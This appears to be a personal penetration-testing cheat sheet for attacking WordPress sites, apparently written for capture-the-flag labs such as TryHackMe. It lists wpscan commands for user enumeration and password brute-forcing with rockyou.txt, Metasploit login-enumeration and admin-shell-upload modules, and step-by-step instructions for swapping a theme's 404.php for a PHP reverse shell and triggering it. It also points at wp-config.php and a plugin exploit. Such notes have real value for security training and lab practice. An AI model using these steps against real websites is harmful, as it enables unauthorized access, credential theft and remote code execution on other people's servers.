Comment on page
Wordpress
- Brute-force
http://$IP/wp-admin
,http://$IP/wp-login.php
# Extract users, versionwpscan --url http://$IP --enumerate# Brute-force creds (user: admin)wpscan --url http://$IP --wordlist rockyou.txt --username $USERS --max-threads 3# Ignore the SSL cert errordisable-tls-checkwpscan -–url https://$IP disable-tls-check - Metasploit
- brute-force:
msf > use auxiliary/scanner/http/wordpress_login_enum
- Check
http://$IP/wp-content/themes
,http://$IP/wp-content/uploads
- Possible attack vectors:
- After login, upload php reverse shell in
404.php
of a theme (wp-content/themes/twentynineteen/404.php
) msf > use exploit/unix/webapp/wp_admin_shell_upload
- Upload malicious plugins in zip
- Check interesting files:
/var/www/wp-config.php
- Check plugins’ vulnerability
- WordPress Plugin User Role Editor (https://www.exploit-db.com/exploits/44595): THM-Jack
<base URL>/wp-content/uploads/<yyyy>/<mm>/<file name>
e.g.
wpscan --url <url> -e vt,tt,u,ap -o wpscan.log
wpscan --url <url> --wordlist <wordlist> --username <username>
Navigate to:
Appearance (left-hand side) > Editor (left-hand side) > 404 Template (right-hand side)
Replace the PHP there with malicious shell spawning PHP (e.g. pentestmonkey php reverse shell script)
Browse to http://<site_name>/wp-content/themes/<theme_name>/404.php to trigger the payload
Last modified 1yr ago